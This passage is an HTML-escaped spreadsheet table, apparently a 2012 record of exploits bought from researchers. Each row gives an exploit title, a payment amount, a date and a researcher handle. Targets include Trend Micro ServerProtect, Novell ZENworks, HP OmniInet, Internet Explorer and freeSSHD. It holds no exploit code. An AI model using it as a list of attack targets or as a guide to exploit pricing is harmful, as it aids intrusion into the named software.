  &lt;td class="xl66"&gt;500.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;15-03-2012 15:11&lt;/td&gt;
  &lt;td class="xl65"&gt;417&lt;/td&gt;
  &lt;td class="xl65"&gt;Excoriot&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Cisco VPN Client Arbitrary
  Command Injection&lt;/td&gt;
  &lt;td class="xl66"&gt;50.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;29-02-2012 20:24&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;TheGreenBow IPSec VPN Client
  Arbitrary Command Injection&lt;/td&gt;
  &lt;td class="xl66"&gt;50.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;01-03-2012 15:12&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Trend Micro ServerProtect 5.58
  CMON_ActiveRollback Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;06-03-2012 15:47&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Trend Micro ServerProtect 5.58
  CMON_ActiveUpdate Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;06-03-2012 15:48&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Trend Micro ServerProtect 5.58
  SetSvcImpersonateUser Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;06-03-2012 16:17&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Trend Micro ServerProtect 5.58
  RPCFN_ENG_AddTaskExportLogItem Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;06-03-2012 19:46&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Trend Micro ServerProtect 5.58
  SetPagerNotifyConfig Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;06-03-2012 19:45&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Trend Micro ServerProtect 5.58
  ENG_SENDMAIL Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;06-03-2012 20:52&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Trend Micro ServerProtect 5.58
  CMON_NetTestConnection Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;07-03-2012 14:01&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Computer Associates Alert
  Notification 0x15 Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;08-03-2012 16:57&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Computer Associates Alert
  Notification 0x17 Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;08-03-2012 16:58&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;NETGEAR SafeNet SoftRemote IKE
  Service Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;10-03-2012 14:57&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;freeSSHD 1.2.1 FXP_OPENDIR
  Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;12-03-2012 14:13&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;freeSSHD 1.2.1 FXP_RENAME
  Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;12-03-2012 14:14&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;GoodTech SSH FXP_OPEN Buffer
  Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;12-03-2012 15:00&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;MPlayer SAMI Subtitle File
  Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;16-03-2012 17:09&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Internet Explorer 8 Insecure
  Library Loading Client-Side Remote Code Execution&lt;/td&gt;
  &lt;td class="xl66"&gt;300.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;22-03-2012 18:17&lt;/td&gt;
  &lt;td class="xl65"&gt;422&lt;/td&gt;
  &lt;td class="xl65"&gt;41.w4r10r&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Novell ZENworks CM Preboot
  Service Opcode 6 Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;26-03-2012 21:26&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Elastix PBX 2.2.0
  callme_page.php Remote Command Execution with Local Privilege Escalation&lt;/td&gt;
  &lt;td class="xl66"&gt;1100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;22-04-2012 22:02&lt;/td&gt;
  &lt;td class="xl65"&gt;423&lt;/td&gt;
  &lt;td class="xl65"&gt;aisg-001&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Novell ZENworks CM Preboot
  Service Opcode 21 Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;27-03-2012 1:57&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;CA Total Defense Suite
  exportReport Stored Procedu re SQL Injection&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;28-03-2012 12:19&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;PEiD PE Import Directory
  Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;30-03-2012 18:52&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Novell ZENworks CM Preboot
  Service Opcode 4C Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;04-04-2012 11:47&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;LANDesk Lenovo ThinkManagement
  Console ServerSetup Command Execution&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;04-04-2012 13:12&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Disk Pulse Server
  GetServerInfo Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;10-04-2012 14:39&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Rabox WinLPD Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;11-04-2012 22:18&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Quest Big Brother Remote File
  Creation&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;12-04-2012 16:28&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;SGI Infosrch.cgi fname Command
  Execution&lt;/td&gt;
  &lt;td class="xl66"&gt;50.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;13-06-2012 11:32&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Nucleus Kernel Recovery for
  Novell Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;15-04-2012 14:15&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;HP OmniInet.exe Opcode 17
  Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;20-04-2012 15:17&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;HP OmniInet.exe Opcode 35
  Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;21-04-2012 11:45&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;HP OmniInet.exe Opcode 46
  Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;22-04-2012 12:08&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;magicdoc.py&lt;/td&gt;
  &lt;td class="xl66"&gt;200.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;09-12-2012 18:10&lt;/td&gt;
  &lt;td class="xl65"&gt;471&lt;/td&gt;
  &lt;td class="xl65"&gt;n0ne&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;CVE-2011-3402 (MS11-087)&lt;/td&gt;
  &lt;td class="xl66"&gt;1000.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;30-07-2012 1:12&lt;/td&gt;
  &lt;td class="xl65"&gt;483&lt;/td&gt;
  &lt;td class="xl65"&gt;Ling Chuan Lee&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Safari SVGPointList
  Use-After-Free&lt;/td&gt;
  &lt;td class="xl66"&gt;500.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;10-08-2012 14:56&lt;/td&gt;
  &lt;td class="xl65"&gt;200&lt;/td&gt;
  &lt;td class="xl65"&gt;dput&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;CVE-2005-0750 - Linux Kernel
  bluetooth integer underflow&lt;/td&gt;
  &lt;td class="xl66"&gt;500.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;13-06-2012 8:24&lt;/td&gt;
  &lt;td class="xl65"&gt;200&lt;/td&gt;
  &lt;td class="xl65"&gt;dput&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;CA BrightStor ARCserve Backup
  caloggerd Arbitrary File Writing Exploit&lt;/td&gt;
  &lt;td class="xl66"&gt;500.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;13-06-2012 8:33&lt;/td&gt;
  &lt;td class="xl65"&gt;200&lt;/td&gt;
  &lt;td class="xl65"&gt;dput&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;CA BrightStor ARCserve Backup
  XDR Parsing Buffer Overflow Exploit&lt;/td&gt;
  &lt;td class="xl66"&gt;500.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;13-06-2012 8:37&lt;/td&gt;
  &lt;td class="xl65"&gt;200&lt;/td&gt;
  &lt;td class="xl65"&gt;dput&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;ZABBIX Server
  node_process_command() Command Execution&lt;/td&gt;
  &lt;td class="xl66"&gt;50.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;13-06-2012 12:55&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;GlobalSCAPE CuteZIP Buffer
  Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;50.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;13-06-2012 12:55&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Blue Coat Reporter Directory
  Traversal Scanner&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;16-06-2012 18:25&lt;/td&gt;
  &lt;td class="xl65"&gt;114&lt;/td&gt;
  &lt;td class="xl65"&gt;bannedit&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;VMware Workstation VMNC Codec
  Parsing Remote Code Execution Vulnerability&lt;/td&gt;
  &lt;td class="xl66"&gt;300.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;24-06-2012 18:47&lt;/td&gt;
  &lt;td class="xl65"&gt;490&lt;/td&gt;
  &lt;td class="xl65"&gt;exodusintel&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;WordPress plugin Asset manager
  upload.php Arbitrary Code Execution&lt;/td&gt;
  &lt;td class="xl66"&gt;25.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;27-06-2012 12:37&lt;/td&gt;
  &lt;td class="xl65"&gt;491&lt;/td&gt;
  &lt;td class="xl65"&gt;Sooraj&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;WordPress plugin WP-Property
  uploadify.php Arbitrary Code Execution&lt;/td&gt;
  &lt;td class="xl66"&gt;25.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;27-06-2012 12:44&lt;/td&gt;
  &lt;td class="xl65"&gt;491&lt;/td&gt;
  &lt;td class="xl65"&gt;Sooraj&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;GoodTech SSH Server 6.5 Stack
  Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;13-07-2012 14:00&lt;/td&gt;
  &lt;td class="xl65"&gt;280&lt;/td&gt;
  &lt;td class="xl65"&gt;James&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;PEiD &amp;lt;= 0.92 Stack Buffer
  Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;13-07-2012 14:02&lt;/td&gt;
  &lt;td class="xl65"&gt;280&lt;/td&gt;
  &lt;td class="xl65"&gt;James&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Cisco Linksys PlayerPT
  SetSource() ActiveX Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;25.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;20-07-2012 14:47&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;IBM Cognos tm1admsd.exe Buffer
  Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;50.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;23-07-2012 15:50&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;IBM Cognos tm1admsd.exe Buffer
  Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;50.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;23-07-2012 15:53&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Novell ZENworks Asset
  Management Remote Code Execution&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;27-07-2012 21:13&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;ACDSee Photo Editor 2008 XBM
  Variable Name Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;29-07-2012 19:31&lt;/td&gt;
  &lt;td class="xl65"&gt;280&lt;/td&gt;
  &lt;td class="xl65"&gt;James&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Cytel Studio 9.0 (CYB File)
  Stack Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;29-07-2012 19:33&lt;/td&gt;
  &lt;td class="xl65"&gt;280&lt;/td&gt;
  &lt;td class="xl65"&gt;James&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Disk Pulse Server
  'GetServerInfo' Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;29-07-2012 19:36&lt;/td&gt;
  &lt;td class="xl65"&gt;280&lt;/td&gt;
  &lt;td class="xl65"&gt;James&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;eSignal Pro &amp;lt;=
  10.6.2425.1208 (QUO File) Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;30-07-2012 2:34&lt;/td&gt;
  &lt;td class="xl65"&gt;280&lt;/td&gt;
  &lt;td class="xl65"&gt;James&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;FreeSSHD &amp;lt;= 1.2.1
  FXP_OPENDIR&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;29-07-2012 19:39&lt;/td&gt;
  &lt;td class="xl65"&gt;280&lt;/td&gt;
  &lt;td class="xl65"&gt;James&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;FreeSSHD &amp;lt;= 1.2.1
  FXP_RENAME&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;29-07-2012 19:41&lt;/td&gt;
  &lt;td class="xl65"&gt;280&lt;/td&gt;
  &lt;td class="xl65"&gt;James&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;R4 winamp plugin&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;05-09-2012 14:49&lt;/td&gt;
  &lt;td class="xl65"&gt;280&lt;/td&gt;
  &lt;td class="xl65"&gt;James&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Solarwinds &amp;lt;= 5.1.2
  LoginServlet Auth Bypass SQLi&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;29-07-2012 19:48&lt;/td&gt;
  &lt;td class="xl65"&gt;280&lt;/td&gt;
  &lt;td class="xl65"&gt;James&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Winamp 5.55 (MAKI script)
  Stack Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;50.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;29-07-2012 19:50&lt;/td&gt;
  &lt;td class="xl65"&gt;280&lt;/td&gt;
  &lt;td class="xl65"&gt;James&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Internet Explorer &amp;lt;=9
  Remote Code Execution&lt;/td&gt;
  &lt;td class="xl66"&gt;700.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;03-08-2012 15:47&lt;/td&gt;
  &lt;td class="xl65"&gt;422&lt;/td&gt;
  &lt;td class="xl65"&gt;41.w4r10r&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;IBM Lotus Quickr QP2 ActiveX
  Import_Times Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;25.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;04-08-2012 15:52&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;IBM Lotus Quickr QP2 ActiveX
  Attachment_Times Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;25.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;04-08-2012 15:54&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
